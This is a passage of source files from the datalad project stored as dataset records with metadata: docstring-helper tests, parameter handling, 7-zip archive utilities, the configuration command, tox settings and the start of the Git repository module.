with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for dochelpers (largely copied from PyMVPA, the same copyright)\n\"\"\"\n\nfrom unittest.mock import patch\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_re_in,\n assert_true,\n)\n\nfrom ..dochelpers import (\n borrowdoc,\n borrowkwargs,\n single_or_plural,\n)\n\n\ndef test_basic():\n assert_equal(single_or_plural('a', 'b', 1), 'a')\n assert_equal(single_or_plural('a', 'b', 0), 'b')\n assert_equal(single_or_plural('a', 'b', 123), 'b')\n assert_equal(single_or_plural('a', 'b', 123, include_count=True), '123 b')\n\n\ndef test_borrow_doc():\n\n class A(object):\n def met1(self):\n \"\"\"met1doc\"\"\"\n pass # pragma: no cover\n def met2(self):\n \"\"\"met2doc\"\"\"\n pass # pragma: no cover\n\n class B(object):\n @borrowdoc(A)\n def met1(self):\n pass # pragma: no cover\n @borrowdoc(A, 'met1')\n def met2(self):\n pass # pragma: no cover\n\n assert_equal(B.met1.__doc__, A.met1.__doc__)\n assert_equal(B.met2.__doc__, A.met1.__doc__)\n\n\ndef test_borrow_kwargs():\n\n class A(object):\n def met1(self, kp1=None, kp2=1):\n \"\"\"met1 doc\n\n Parameters\n ----------\n kp1 : None or int\n keyword parameter 1\n kp2 : int, optional\n something\n \"\"\"\n pass # pragma: no cover\n\n def met2(self):\n \"\"\"met2doc\"\"\"\n pass # pragma: no cover\n\n class B(object):\n\n @borrowkwargs(A)\n def met1(self, desc, **kwargs):\n \"\"\"B.met1 doc\n\n Parameters\n ----------\n desc\n description\n **kwargs\n Same as in A.met1\n\n Some postamble\n \"\"\"\n pass # pragma: no cover\n\n @borrowkwargs(A, 'met1')\n def met_nodoc(self, **kwargs):\n pass # pragma: no cover\n\n @borrowkwargs(methodname=A.met1)\n def met_anothermet(self, **kwargs):\n pass # pragma: no cover\n\n @borrowkwargs(A, 'met1')\n def met_nodockwargs(self, bogus=None, **kwargs):\n \"\"\"B.met_nodockwargs\n\n Parameters\n ----------\n bogus\n something\n \"\"\"\n pass # pragma: no cover\n\n if True:\n # Just so we get different indentation level\n @borrowkwargs(A, 'met1', ['kp1'])\n def met_excludes(self, boguse=None, **kwargs):\n \"\"\"B.met_excludes\n\n Parameters\n ----------\n boguse\n something\n \"\"\"\n pass # pragma: no cover\n\n assert_true('B.met1 doc' in B.met1.__doc__)\n for m in (B.met1,\n B.met_nodoc,\n B.met_anothermet,\n B.met_nodockwargs,\n B.met_excludes):\n docstring = m.__doc__\n assert_true('Parameters' in docstring)\n assert_true(not '*kwargs' in docstring,\n msg=\"We shouldn't carry kwargs in docstring now,\"\n \"Got %r for %s\" % (docstring, m))\n assert_true('kp2 ' in docstring)\n assert_true((('kp1 ' in docstring)\n ^ (m == B.met_excludes)))\n # indentation should have been squashed properly\n assert_true(not ' ' in docstring)\n\n # some additional checks to see if we are not losing anything\n assert_true('Some postamble' in B.met1.__doc__)\n assert_true('B.met_nodockwargs' in B.met_nodockwargs.__doc__)\n assert_true('boguse' in B.met_excludes.__doc__)\n" }, { "alpha_fraction": 0.5509049892425537, "alphanum_fraction": 0.5550528168678284, "avg_line_length": 38.582088470458984, "blob_id": "ecb13c0e854fa4ba1cdca1df7b63aff8fbd317bc", "content_id": "2c8a7c61e6de6fdcc6eb27836df5bd76ac0c194c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5304, "license_type": "permissive", "max_line_length": 88, "num_lines": 134, "path": "/datalad/support/param.py", "repo_name": 
"datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##g\n\"\"\"Parameter representation\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport re\nimport textwrap\nimport argparse\nfrom datalad.utils import getargspec\n\nfrom .constraints import expand_constraint_spec\n\n_whitespace_re = re.compile(r'\\n\\s+|^\\s+')\n\n\nclass Parameter(object):\n \"\"\"This class shall serve as a representation of a parameter.\n \"\"\"\n\n # Known keyword arguments which we want to allow to pass over into\n # argparser.add_argument . Mentioned explicitly, since otherwise\n # are not verified while working in Python-only API\n # include_kwonlyargs=True is future-proofing since ATM in 3.9 there is no\n # *, in Action.__init__ but could be added later, and semantically it\n # makes sense to include those among _KNOWN_ARGS\n _KNOWN_ARGS = getargspec(\n argparse.Action.__init__, include_kwonlyargs=True\n ).args + ['action']\n\n def __init__(self, constraints=None, doc=None, args=None, **kwargs):\n \"\"\"Add constraints (validator) specifications and a docstring for\n a parameter.\n\n Parameters\n ----------\n constraints : callable\n A functor that takes any input value, performs checks or type\n conversions and finally returns a value that is appropriate for a\n parameter or raises an exception. This will also be used to set up\n the ``type`` functionality of argparse.add_argument.\n doc : str\n Documentation about the purpose of this parameter.\n args : tuple or None\n Any additional positional args for argparser.add_argument. This is\n most useful for assigned multiple alternative argument names or\n create positional arguments.\n **kwargs :\n Any additional keyword args for argparser.add_argument.\n\n Examples\n --------\n Ensure a parameter is a float\n >>> from datalad.support.param import Parameter\n >>> from datalad.support.constraints import (EnsureFloat, EnsureRange,\n ... AltConstraints, Constraints)\n >>> C = Parameter(constraints=EnsureFloat())\n\n Ensure a parameter is of type float or None:\n >>> C = Parameter(constraints=AltConstraints(EnsureFloat(), None))\n\n Ensure a parameter is None or of type float and lies in the inclusive\n range (7.0,44.0):\n >>> C = Parameter(\n ... AltConstraints(\n ... Constraints(EnsureFloat(),\n ... EnsureRange(min=7.0, max=44.0)),\n ... None))\n \"\"\"\n self.constraints = expand_constraint_spec(constraints)\n self._doc = doc\n self.cmd_args = args\n\n # Verify that no mistyped kwargs present\n unknown_args = set(kwargs).difference(self._KNOWN_ARGS)\n if unknown_args:\n raise ValueError(\n \"Detected unknown argument(s) for the Parameter: %s. 
Known are: %s\"\n % (', '.join(unknown_args), ', '.join(self._KNOWN_ARGS))\n )\n self.cmd_kwargs = kwargs\n\n def get_autodoc(self, name, indent=\" \", width=70, default=None, has_default=False):\n \"\"\"Docstring for the parameter to be used in lists of parameters\n\n Returns\n -------\n string or list of strings (if indent is None)\n \"\"\"\n paramsdoc = '%s' % name\n sdoc = None\n if self.constraints is not None:\n sdoc = self.constraints.short_description()\n elif 'action' in self.cmd_kwargs \\\n and self.cmd_kwargs['action'] in (\"store_true\", \"store_false\"):\n sdoc = 'bool'\n if sdoc is not None:\n if sdoc[0] == '(' and sdoc[-1] == ')':\n sdoc = sdoc[1:-1]\n nargs = self.cmd_kwargs.get('nargs', '')\n if isinstance(nargs, int):\n sdoc = '{}-item sequence of {}'.format(nargs, sdoc)\n elif nargs == '+':\n sdoc = 'non-empty sequence of {}'.format(sdoc)\n elif nargs == '*':\n sdoc = 'sequence of {}'.format(sdoc)\n if self.cmd_kwargs.get('action', None) == 'append':\n sdoc = 'list of {}'.format(sdoc)\n paramsdoc += \" : %s\" % sdoc\n if has_default:\n paramsdoc += \", optional\"\n paramsdoc = [paramsdoc]\n\n doc = self._doc\n if doc is None:\n doc = ''\n doc = doc.strip()\n if len(doc) and not doc.endswith('.'):\n doc += '.'\n if has_default:\n doc += \" [Default: %r]\" % (default,)\n # Explicitly deal with multiple spaces, for some reason\n # replace_whitespace is non-effective\n doc = _whitespace_re.sub(' ', doc)\n paramsdoc += [indent + x\n for x in textwrap.wrap(doc, width=width - len(indent),\n replace_whitespace=True)]\n return '\\n'.join(paramsdoc)\n" }, { "alpha_fraction": 0.5807946920394897, "alphanum_fraction": 0.5887417197227478, "avg_line_length": 30.45833396911621, "blob_id": "ee96511954af0ac9f5d01a288bbababf4664c844", "content_id": "b7fb50c696de448463ceec36016179c5b39e9cc7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3020, "license_type": "permissive", "max_line_length": 87, "num_lines": 96, "path": "/datalad/support/archive_utils_7z.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"7-zip based implementation for datalad.support.archives utilities\"\"\"\n\n\nfrom datalad.support.external_versions import external_versions\nexternal_versions.check(\n \"cmd:7z\",\n msg='The 7z binary (7-Zip) is required for archive handling, but is missing. 
'\n \"Setting the config flag 'datalad.runtime.use-patool' enables an \"\n \"alternative implementation that may not need 7z.\")\n\nfrom datalad.utils import (\n Path,\n join_cmdline,\n quote_cmdlinearg,\n)\n\nimport logging\nlgr = logging.getLogger('datalad.support.archive_utils_7z')\n\nfrom datalad.cmd import (\n WitlessRunner as Runner,\n KillOutput,\n)\n\n\ndef _normalize_fname_suffixes(suffixes):\n if suffixes == ['.tgz']:\n suffixes = ['.tar', '.gz']\n elif suffixes == ['.tbz2']:\n suffixes = ['.tar', '.bzip2']\n return suffixes\n\n\ndef decompress_file(archive, dir_):\n \"\"\"Decompress `archive` into a directory `dir_`\n\n This is an alternative implementation without patool, but directly calling 7z.\n\n Parameters\n ----------\n archive: str\n dir_: str\n \"\"\"\n apath = Path(archive)\n runner = Runner(cwd=dir_)\n suffixes = _normalize_fname_suffixes(apath.suffixes)\n if len(suffixes) > 1 and suffixes[-2] == '.tar':\n # we have a compressed tar file that needs to be fed through the\n # decompressor first\n cmd = '7z x {} -so | 7z x -si -ttar'.format(quote_cmdlinearg(archive))\n else:\n # fire and forget\n cmd = ['7z', 'x', archive]\n runner.run(cmd, protocol=KillOutput)\n\n\ndef compress_files(files, archive, path=None, overwrite=True):\n \"\"\"Compress `files` into an `archive` file\n\n Parameters\n ----------\n files : list of str\n archive : str\n path : str\n Alternative directory under which compressor will be invoked, to e.g.\n take into account relative paths of files and/or archive\n overwrite : bool\n Whether to allow overwriting the target archive file if one already exists\n \"\"\"\n runner = Runner(cwd=path)\n apath = Path(archive)\n if apath.exists():\n if overwrite:\n apath.unlink()\n else:\n raise ValueError(\n 'Target archive {} already exists and overwrite is forbidden'.format(\n apath)\n )\n suffixes = _normalize_fname_suffixes(apath.suffixes)\n if len(suffixes) > 1 and suffixes[-2] == '.tar':\n cmd = '7z u .tar -so -- {} | 7z u -si -- {}'.format(\n join_cmdline(files),\n quote_cmdlinearg(str(apath)),\n )\n else:\n cmd = ['7z', 'u', str(apath), '--'] + files\n runner.run(cmd, protocol=KillOutput)\n" }, { "alpha_fraction": 0.557486891746521, "alphanum_fraction": 0.558880090713501, "avg_line_length": 35.58495330810547, "blob_id": "59fc07df1633d342d4ea1d6e96cbc7d50a5536e8", "content_id": "580cbc5981de35fe2ffc2fe08bf70c86759537a8", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15073, "license_type": "permissive", "max_line_length": 95, "num_lines": 412, "path": "/datalad/local/configuration.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Frontend for the DataLad config\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nfrom textwrap import wrap\n\nimport datalad.support.ansi_colors as ac\nfrom datalad import cfg as dlcfg\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n 
eval_results,\n)\nfrom datalad.interface.common_cfg import definitions as cfg_defs\nfrom datalad.interface.common_opts import (\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.interface.utils import default_result_renderer\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n)\nfrom datalad.support.exceptions import (\n CommandError,\n NoDatasetFound,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n Path,\n ensure_list,\n)\n\nlgr = logging.getLogger('datalad.local.configuration')\n\nconfig_actions = ('dump', 'get', 'set', 'unset')\n\n\n@build_doc\nclass Configuration(Interface):\n \"\"\"Get and set dataset, dataset-clone-local, or global configuration\n\n This command works similar to git-config, but some features are not\n supported (e.g., modifying system configuration), while other features\n are not available in git-config (e.g., multi-configuration queries).\n\n Query and modification of three distinct configuration scopes is\n supported:\n\n - 'branch': the persistent configuration in .datalad/config of a dataset\n branch\n - 'local': a dataset clone's Git repository configuration in .git/config\n - 'global': non-dataset-specific configuration (usually in $USER/.gitconfig)\n\n Modifications of the persistent 'branch' configuration will not be saved\n by this command, but have to be committed with a subsequent `save`\n call.\n\n Rules of precedence regarding different configuration scopes are the same\n as in Git, with two exceptions: 1) environment variables can be used to\n override any datalad configuration, and have precedence over any other\n configuration scope (see below). 2) the 'branch' scope is considered in\n addition to the standard git configuration scopes. Its content has lower\n precedence than Git configuration scopes, but it is committed to a branch,\n hence can be used to ship (default and branch-specific) configuration with\n a dataset.\n\n Besides storing configuration settings statically via this command or ``git\n config``, DataLad also reads any :envvar:`DATALAD_*` environment on process\n startup or import, and maps it to a configuration item. Their values take\n precedence over any other specification. In variable names ``_`` encodes a\n ``.`` in the configuration name, and ``__`` encodes a ``-``, such that\n ``DATALAD_SOME__VAR`` is mapped to ``datalad.some-var``. Additionally, a\n :envvar:`DATALAD_CONFIG_OVERRIDES_JSON` environment variable is\n queried, which may contain configuration key-value mappings as a\n JSON-formatted string of a JSON-object::\n\n DATALAD_CONFIG_OVERRIDES_JSON='{\"datalad.credential.example_com.user\": \"jane\", ...}'\n\n This is useful when characters are part of the configuration key that\n cannot be encoded into an environment variable name. 
If both individual\n configuration variables *and* JSON-overrides are used, the former take\n precedent over the latter, overriding the respective *individual* settings\n from configurations declared in the JSON-overrides.\n\n This command supports recursive operation for querying and modifying\n configuration across a hierarchy of datasets.\n \"\"\"\n _examples_ = [\n dict(text=\"Dump the effective configuration, including an annotation for common items\",\n code_py=\"configuration()\",\n code_cmd=\"datalad configuration\"),\n dict(text=\"Query two configuration items\",\n code_py=\"configuration('get', ['user.name', 'user.email'])\",\n code_cmd=\"datalad configuration get user.name user.email\"),\n dict(text=\"Recursively set configuration in all (sub)dataset repositories\",\n code_py=\"configuration('set', [('my.config.name', 'value')], recursive=True)\",\n code_cmd=\"datalad configuration -r set my.config=value\"),\n dict(text=\"Modify the persistent branch configuration (changes are not committed)\",\n code_py=\"configuration('set', [('my.config.name', 'value')], scope='branch')\",\n code_cmd=\"datalad configuration --scope branch set my.config=value\"),\n ]\n\n result_renderer = 'tailored'\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to query or to configure\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n action=Parameter(\n args=(\"action\",),\n nargs='?',\n doc=\"\"\"which action to perform\"\"\",\n constraints=EnsureChoice(*config_actions)),\n scope=Parameter(\n args=(\"--scope\",),\n doc=\"\"\"scope for getting or setting\n configuration. If no scope is declared for a query, all\n configuration sources (including overrides via environment\n variables) are considered according to the normal\n rules of precedence. For action 'get' only 'branch' and 'local'\n (which include 'global' here) are supported. For action 'dump',\n a scope selection is ignored and all available scopes are\n considered.\"\"\",\n constraints=EnsureChoice('global', 'local', 'branch', None)),\n spec=Parameter(\n args=(\"spec\",),\n doc=\"\"\"configuration name (for actions 'get' and 'unset'),\n or name/value pair (for action 'set')\"\"\",\n nargs='*',\n metavar='name[=value]'),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n )\n\n @staticmethod\n @datasetmethod(name='configuration')\n @eval_results\n def __call__(\n action='dump',\n spec=None,\n *,\n scope=None,\n dataset=None,\n recursive=False,\n recursion_limit=None):\n\n # check conditions\n # - global and recursion makes no sense\n\n if action == 'dump':\n if scope:\n raise ValueError(\n 'Scope selection is not supported for dumping')\n\n # normalize variable specificatons\n specs = []\n for s in ensure_list(spec):\n if isinstance(s, tuple):\n specs.append((str(s[0]), str(s[1])))\n elif '=' not in s:\n specs.append((str(s),))\n else:\n specs.append(tuple(s.split('=', 1)))\n\n if action == 'set':\n missing_values = [s[0] for s in specs if len(s) < 2]\n if missing_values:\n raise ValueError(\n 'Values must be provided for all configuration '\n 'settings. Missing: {}'.format(missing_values))\n invalid_names = [s[0] for s in specs if '.' not in s[0]]\n if invalid_names:\n raise ValueError(\n 'Name must contain a section (i.e. \"section.name\"). 
'\n 'Invalid: {}'.format(invalid_names))\n\n ds = None\n if scope != 'global' or recursive:\n try:\n ds = require_dataset(\n dataset,\n check_installed=True,\n purpose='configure')\n except NoDatasetFound:\n if action != 'dump' or dataset:\n raise\n\n res_kwargs = dict(\n action='configuration',\n logger=lgr,\n )\n if ds:\n res_kwargs['refds'] = ds.path\n yield from configuration(action, scope, specs, res_kwargs, ds)\n\n if not recursive:\n return\n\n for subds in ds.subdatasets(\n state='present',\n recursive=True,\n recursion_limit=recursion_limit,\n on_failure='ignore',\n return_type='generator',\n result_renderer='disabled'):\n yield from configuration(\n action, scope, specs, res_kwargs, Dataset(subds['path']))\n\n @staticmethod\n def custom_result_renderer(res, **kwargs):\n if (res['status'] != 'ok' or\n res['action'] not in ('get_configuration',\n 'dump_configuration')):\n if 'message' not in res and 'name' in res:\n suffix = '={}'.format(res['value']) if 'value' in res else ''\n res['message'] = '{}{}'.format(\n res['name'],\n suffix)\n default_result_renderer(res)\n return\n # TODO source\n from datalad.ui import ui\n name = res['name']\n if res['action'] == 'dump_configuration':\n for key in ('purpose', 'description'):\n s = res.get(key)\n if s:\n ui.message('\\n'.join(wrap(\n s,\n initial_indent='# ',\n subsequent_indent='# ',\n )))\n\n if kwargs.get('recursive', False):\n have_subds = res['path'] != res['refds']\n # we need to mark up from which dataset results are reported\n prefix = '<ds>{}{}:'.format(\n '/' if have_subds else '',\n Path(res['path']).relative_to(res['refds']).as_posix()\n if have_subds else '',\n )\n else:\n prefix = ''\n\n if kwargs.get('action', None) == 'dump':\n if 'value_type' in res:\n value_type = res['value_type']\n vtype = value_type.short_description() \\\n if hasattr(value_type, 'short_description') else str(value_type)\n vtype = f'Value constraint: {vtype}'\n ui.message('\\n'.join(wrap(\n vtype,\n initial_indent='# ',\n subsequent_indent='# ',\n break_on_hyphens=False,\n )))\n else:\n vtype = ''\n value = res['value'] if res['value'] is not None else ''\n if value in (True, False):\n # normalize booleans for git-config syntax\n value = str(value).lower()\n ui.message(f'{prefix}{ac.color_word(name, ac.BOLD)}={value}')\n else:\n ui.message('{}{}'.format(\n prefix,\n res['value'] if res['value'] is not None else '',\n ))\n\n\ndef configuration(action, scope, specs, res_kwargs, ds=None):\n if scope == 'global' or (action == 'dump' and ds is None):\n cfg = dlcfg\n else:\n cfg = ds.config\n\n if action not in config_actions:\n raise ValueError(\"Unsupported action '{}'\".format(action))\n\n if action == 'dump':\n if not specs:\n # dumping is querying for all known keys\n specs = [(n,) for n in sorted(set(cfg_defs.keys()).union(cfg.keys()))]\n scope = None\n\n for spec in specs:\n if '.' 
not in spec[0]:\n yield get_status_dict(\n ds=ds,\n status='error',\n message=(\n \"Configuration key without a section: '%s'\",\n spec[0],\n ),\n **res_kwargs)\n continue\n # TODO without get-all there is little sense in having add\n #if action == 'add':\n # res = _add(cfg, scope, spec)\n if action == 'get':\n res = _get(cfg, scope, spec[0])\n elif action == 'dump':\n res = _dump(cfg, spec[0])\n # TODO this should be there, if we want to be comprehensive\n # however, we turned this off by default in the config manager\n # because we hardly use it, and the handling in ConfigManager\n # is not really well done.\n #elif action == 'get-all':\n # res = _get_all(cfg, scope, spec)\n elif action == 'set':\n res = _set(cfg, scope, *spec)\n elif action == 'unset':\n res = _unset(cfg, scope, spec[0])\n\n if ds:\n res['path'] = ds.path\n\n if 'status' not in res:\n res['status'] = 'ok'\n\n yield dict(res_kwargs, **res)\n\n if action in ('add', 'set', 'unset'):\n # we perform a single reload, rather than one for each modification\n # TODO: can we detect a call from cmdline? We could skip the reload.\n cfg.reload(force=True)\n\n\ndef _dump(cfg, name):\n value = cfg.get(\n name,\n # pull a default from the config definitions\n # if we have no value, but a key\n cfg_defs.get(name, {}).get('default', None))\n\n res = dict(\n action='dump_configuration',\n name=name,\n value=value,\n )\n if name in cfg_defs:\n ui_def = cfg_defs[name].get('ui', [None, {}])[1]\n for s, key in (\n (ui_def.get('title'), 'purpose'),\n (ui_def.get('text'), 'description'),\n (cfg_defs[name].get('type'), 'value_type')):\n if s:\n res[key] = s\n return res\n\n\ndef _get(cfg, scope, name):\n value = cfg.get_from_source(scope, name) \\\n if scope else cfg.get(\n name,\n # pull a default from the config definitions\n # if we have no value, but a key (i.e. in dump mode)\n cfg_defs.get(name, {}).get('default', None))\n return dict(\n action='get_configuration',\n name=name,\n value=value,\n )\n\n\ndef _set(cfg, scope, name, value):\n cfg.set(name, value, scope=scope, force=True, reload=False)\n return dict(\n action='set_configuration',\n name=name,\n value=value,\n )\n\n\ndef _unset(cfg, scope, name):\n try:\n cfg.unset(name, scope=scope, reload=False)\n except CommandError as e:\n # we could also check if the option exists in the merged/effective\n # config first, but then we would have to make sure that there could\n # be no valid way of overriding a setting in a particular scope.\n # seems safer to do it this way\n if e.code == 5:\n return dict(\n status='error',\n action='unset_configuration',\n name=name,\n message=(\"configuration '%s' does not exist (%s)\", name, e),\n )\n return dict(\n action='unset_configuration',\n name=name,\n )\n" }, { "alpha_fraction": 0.6834757924079895, "alphanum_fraction": 0.7019942998886108, "avg_line_length": 27.30645179748535, "blob_id": "e3ee08fa86228e3d29a2f2cf851c5e6649fb407d", "content_id": "f409ebc4d81820550953605f34af558039106c0f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 3510, "license_type": "permissive", "max_line_length": 135, "num_lines": 124, "path": "/tox.ini", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "[tox]\nenvlist = py3,lint,typing\n#,flake8\n\n[testenv:py3]\nchangedir = __testhome__\ncommands = pytest -c ../tox.ini -v {posargs} --pyargs datalad\nextras = full\n# tox 2. 
introduced isolation from invocation environment\n# HOME is used by annex standalone atm\n# https://git-annex.branchable.com/bugs/standalone_builds_shouldn__39__t_pollute___126____47__.ssh_with_helpers_merely_upon_annex_init/\n# so let's pass it, though in the future we should isolate\n# it back to guarantee that the tests do not rely on anything in\n# current user HOME\npassenv=HOME\nsetenv=\n DATALAD_LOG_LEVEL=DEBUG\n\n[testenv:lint]\nskip_install = true\ndeps =\n codespell~=2.0\n pylint~=2.15\ncommands =\n codespell\n # pylinting limited set of known obvious issues only\n pylint -d all -e W1202 datalad setup.py\n\n[testenv:flake8]\ncommands = flake8 {posargs}\n\n[testenv:typing]\nextras = tests\ndeps =\n distro # Remove when CI no longer uses Python 3.7 for type-checking.\n types-psutil\ncommands =\n # TODO: rich \"coverage\" sufficient to remove --follow-imports skip, and just specify datalad .\n # See https://github.com/datalad/datalad/issues/6884\n mypy --follow-imports skip {posargs} \\\n datalad/api.py \\\n datalad/cmd.py \\\n datalad/downloaders/providers.py \\\n datalad/interface/results.py \\\n datalad/runner \\\n datalad/support/annex_utils.py \\\n datalad/support/ansi_colors.py \\\n datalad/support/collections.py \\\n datalad/support/cookies.py \\\n datalad/support/digests.py \\\n datalad/support/gitrepo.py \\\n datalad/support/globbedpaths.py \\\n datalad/support/path.py \\\n datalad/support/strings.py \\\n datalad/typing.py \\\n datalad/utils.py\n\n[testenv:venv]\ncommands = {posargs}\n\n[testenv:docs]\nbasepython = python3\nextras =\n devel-docs\n full\nchangedir = docs\ncommands = sphinx-build -E -W -b html source build\n\n[pytest]\nfilterwarnings =\n error::DeprecationWarning:^datalad\n # TODO: https://github.com/datalad/datalad/issues/7435\n ignore:pkg_resources is deprecated:DeprecationWarning:\n error:.*yield tests:pytest.PytestCollectionWarning\n ignore:distutils Version classes are deprecated:DeprecationWarning\n # comes from boto\n ignore:the imp module is deprecated\n # workaround for https://github.com/datalad/datalad/issues/6307\n ignore:The distutils package is deprecated\nmarkers =\n fail_slow\n githubci_osx\n githubci_win\n integration\n known_failure\n known_failure_githubci_osx\n known_failure_githubci_win\n known_failure_osx\n known_failure_windows\n network\n osx\n probe_known_failure\n serve_path_via_http\n skip_if_adjusted_branch\n skip_if_no_network\n skip_if_on_windows\n skip_if_root\n skip_known_failure\n skip_nomultiplex_ssh\n skip_ssh\n skip_wo_symlink_capability\n slow\n turtle\n usecase\n windows\n with_config\n with_fake_cookies_db\n with_memory_keyring\n with_sameas_remotes\n with_testrepos\n without_http_proxy\n# Ensure that assertion helpers in utils_pytest.py get rewritten by pytest:\npython_files = test_*.py *_test.py utils_pytest.py\n\n[flake8]\n#show-source = True\n# E265 = comment blocks like @{ section, which it can't handle\n# E266 = too many leading '#' for block comment\n# E731 = do not assign a lambda expression, use a def\n# W293 = Blank line contains whitespace\n#ignore = E265,W293,E266,E731\nmax-line-length = 120\ninclude = datalad\nexclude = .tox,.venv,venv-debug,build,dist,doc,git/ext/\n" }, { "alpha_fraction": 0.5465742945671082, "alphanum_fraction": 0.5487117767333984, "avg_line_length": 38.763431549072266, "blob_id": "7e65670f7d0061bb15e1e77794cb3475d28126b5", "content_id": "0384ee63ed322ed8f016bfc8b48e6daf36f4a1a2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 157662, "license_type": "permissive", "max_line_length": 267, "num_lines": 3965, "path": "/datalad/support/gitrepo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Internal low-level interface to Git repositories\n\n\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\nimport os\nimport os.path as op\nimport posixpath\nimport re\nimport subprocess\nimport warnings\nfrom collections.abc import (\n Callable,\n Iterable,\n Iterator,\n Mapping,\n Sequence,\n)\nfrom functools import wraps\nfrom itertools import chain\nfrom os import (\n PathLike,\n linesep,\n)\nfrom os.path import (\n commonprefix,\n curdir,\n dirname,\n exists,\n isabs,\n)\nfrom os.path import join as opj\nfrom os.path import (\n pardir,\n relpath,\n sep,\n)\nfrom re import Pattern\nfrom typing import (\n TYPE_CHECKING,\n Any,\n List,\n Optional,\n Tuple,\n TypeVar,\n Union,\n overload,\n)\n\nimport datalad.utils as ut\nfrom datalad import ssh_manager\nfrom datalad.cmd import (\n BatchedCommand,\n GitWitlessRunner,\n NoCapture,\n StdOutErrCapture,\n WitlessProtocol,\n)\nfrom datalad.config import (\n parse_gitconfig_dump,\n write_config_section,\n)\nfrom datalad.consts import (\n ILLEGAL_CHARS_WIN,\n RESERVED_NAMES_WIN,\n)\nfrom datalad.core.local.repo import repo_from_path\nfrom datalad.dataset.gitrepo import GitRepo as CoreGitRepo\nfrom datalad.dataset.gitrepo import (\n _get_dot_git,\n path_based_str_repr,\n)\nfrom datalad.log import log_progress\nfrom datalad.support.due import (\n Doi,\n due,\n)\nfrom datalad.typing import (\n Concatenate,\n Literal,\n P,\n Protocol,\n Self,\n T,\n TypedDict,\n)\nfrom datalad.utils import (\n Path,\n PurePosixPath,\n ensure_dir,\n ensure_list,\n ensure_unicode,\n generate_file_chunks,\n getpwd,\n is_interactive,\n on_windows,\n optional_args,\n path_is_subpath,\n posix_relpath,\n)\n\nfrom .exceptions import (\n CapturedException,\n CommandError,\n FileNotInRepositoryError,\n InvalidGitReferenceError,\n InvalidGitRepositoryError,\n NoSuchPathError,\n)\n# imports from same module:\nfrom .external_versions import external_versions\nfrom .network import (\n RI,\n PathRI,\n is_ssh,\n)\nfrom .path import (\n get_filtered_paths_,\n get_parent_paths,\n)\n\nif TYPE_CHECKING:\n from datalad.distribution.dataset import Dataset\n\n# shortcuts\n_curdirsep = curdir + sep\n_pardirsep = pardir + sep\n\n\nlgr = logging.getLogger('datalad.gitrepo')\n\nOption = Union[str, bool, None, List[Union[str, bool, None]], Tuple[Union[str, bool, None], ...]]\n\n\n# outside the repo base classes only used in ConfigManager\ndef to_options(split_single_char_options: bool = True, **kwargs: Option) -> list[str]:\n \"\"\"Transform keyword arguments into a list of cmdline options\n\n Imported from GitPython.\n\n Original copyright:\n Copyright (C) 2008, 2009 Michael Trier and contributors\n Original license:\n BSD 3-Clause \"New\" or \"Revised\" License\n\n Parameters\n ----------\n split_single_char_options: bool\n\n kwargs:\n\n Returns\n -------\n list\n \"\"\"\n def dashify(string: str) -> str:\n return string.replace('_', '-')\n\n def transform_kwarg(name: str, value: str | 
